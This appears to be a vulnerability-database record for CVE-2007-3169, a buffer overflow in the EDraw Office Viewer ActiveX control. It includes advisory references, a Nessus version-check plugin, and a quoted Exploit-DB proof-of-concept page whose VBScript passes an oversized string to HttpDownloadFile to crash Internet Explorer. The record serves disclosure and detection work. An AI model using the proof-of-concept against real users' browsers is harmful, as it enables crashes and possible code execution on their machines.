ID CVE-2007-3169 Type cve Reporter cve@mitre.org Modified 2017-10-11T01:32:00
Description
Buffer overflow in a certain ActiveX control in the EDraw Office Viewer Component (edrawofficeviewer.ocx) 4.0.5.20, and other versions before 5.0, allows remote attackers to cause a denial of service (Internet Explorer 7 crash) or execute arbitrary code via a long first argument to the HttpDownloadFile method.
{"osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:25418](https://secuniaresearch.flexerasoftware.com/advisories/25418/)\n[Related OSVDB ID: 36044](https://vulners.com/osvdb/OSVDB:36044)\nOther Advisory URL: http://moaxb.blogspot.com/2007/05/moaxb-29-edraw-office-viewer-component.html\nOther Advisory URL: http://shinnai.altervista.org/viewtopic.php?id=42&t_id=32\nKeyword: MoAxB #29\nISS X-Force ID: 34590\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4009\nFrSIRT Advisory: ADV-2007-1992\n[CVE-2007-3169](https://vulners.com/cve/CVE-2007-3169)\nBugtraq ID: 24229\n", "modified": "2007-05-29T12:48:48", "published": "2007-05-29T12:48:48", "href": "https://vulners.com/osvdb/OSVDB:36045", "id": "OSVDB:36045", "title": "EDraw Office Viewer Component ActiveX (edrawofficeviewer.ocx) HttpDownloadFile Method Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T19:53:56", "bulletinFamily": "exploit", "description": "EDraw Office Viewer Component Denial of Service Exploit. CVE-2007-3169. Dos exploit for windows platform", "modified": "2007-05-30T00:00:00", "published": "2007-05-30T00:00:00", "id": "EDB-ID:4009", "href": "https://www.exploit-db.com/exploits/4009/", "type": "exploitdb", "title": "EDraw Office Viewer Component Denial of Service Exploit", "sourceData": "<pre>\n<span style=\"font: 14pt Courier New;\"><p align=\"center\"><b>2007/05/29</b></p></span>\n<code><span style=\"font: 10pt Courier New;\"><span class=\"general1-symbol\">---------------------------------------------------------------------------------------------\n <b>EDraw Office Viewer Component (edrawofficeviewer.ocx v. 4.0.5.20) Denial of Service Exploit</b>\n url: http://www.ocxt.com/officeviewer.php\n\n author: shinnai\n mail: shinnai[at]autistici[dot]org\n site: http://shinnai.altervista.org\n \n Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7\n all software that use this ocx are vulnerable to this exploits.\n\n This ActiveX is marked as:\n RegKey Safe for Script: True\n RegKey Safe for Init: True\n KillBitSet: False\n---------------------------------------------------------------------------------------------\n\n<object classid='clsid:053AFEBA-D968-435F-B557-19FF76372B1B' id='test'></object>\n\n<input language=VBScript onclick=tryMe() type=button value=\"Click here to start the test\">\n\n<script language='vbscript'>\n Sub tryMe\n buff = String(1000, \"A\")\n\n test.HttpDownloadFile buff, \"Default\"\n\n End Sub\n</script>\n</span></span>\n</code></pre>\n\n# milw0rm.com [2007-05-30]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/4009/"}], "nessus": [{"lastseen": "2019-02-21T01:10:02", "bulletinFamily": "scanner", "description": "The remote host contains the Office Viewer Component, an ActiveX control for working with Microsoft Office documents. \n\nThe version of this control installed on the remote host contains a buffer overflow in its 'HttpDownloadFile' method that could be exploited to execute arbitrary code remotely if an attacker can trick a user on the affected host into visiting a specially crafted web page. \n\nIn addition, it also allows an attacker to delete arbitrary files via the 'DeleteLocalFile' method.", "modified": "2018-08-22T00:00:00", "id": "OFFICEVIEWER_ACTIVEX_5.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=26012", "published": "2007-09-10T00:00:00", "title": "Office Viewer Component < 5.0 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(26012);\n script_version(\"1.11\");\n\n script_cve_id(\"CVE-2007-3168\", \"CVE-2007-3169\");\n script_bugtraq_id(24229, 24230);\n script_xref(name:\"EDB-ID\", value:\"4009\");\n script_xref(name:\"EDB-ID\", value:\"4010\");\n\n script_name(english:\"Office Viewer Component < 5.0 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of Office Viewer Component ActiveX control\"); \n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains the Office Viewer Component, an ActiveX\ncontrol for working with Microsoft Office documents. \n\nThe version of this control installed on the remote host contains a\nbuffer overflow in its 'HttpDownloadFile' method that could be\nexploited to execute arbitrary code remotely if an attacker can trick\na user on the affected host into visiting a specially crafted web\npage. \n\nIn addition, it also allows an attacker to delete arbitrary files via\nthe 'DeleteLocalFile' method.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://moaxb.blogspot.com/2007/05/moaxb-28-edraw-office-viewer-component.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://moaxb.blogspot.com/2007/05/moaxb-29-edraw-office-viewer-component.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.ocxt.com/archives/28\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Office Viewer Component version 5 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/09/10\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/05/28\");\n script_cvs_date(\"Date: 2018/08/22 16:49:14\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = \"{053AFEBA-D968-435F-B557-19FF76372B1B}\";\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n # Check its version.\n ver = activex_get_fileversion(clsid:clsid);\n if (ver && activex_check_fileversion(clsid:clsid, fix:\"5.0.0.0\") == TRUE)\n {\n report = string(\n \"Version \", ver, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\"\n );\n security_hole(port:kb_smb_transport(), extra:report);\n }\n}\nactivex_end();\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
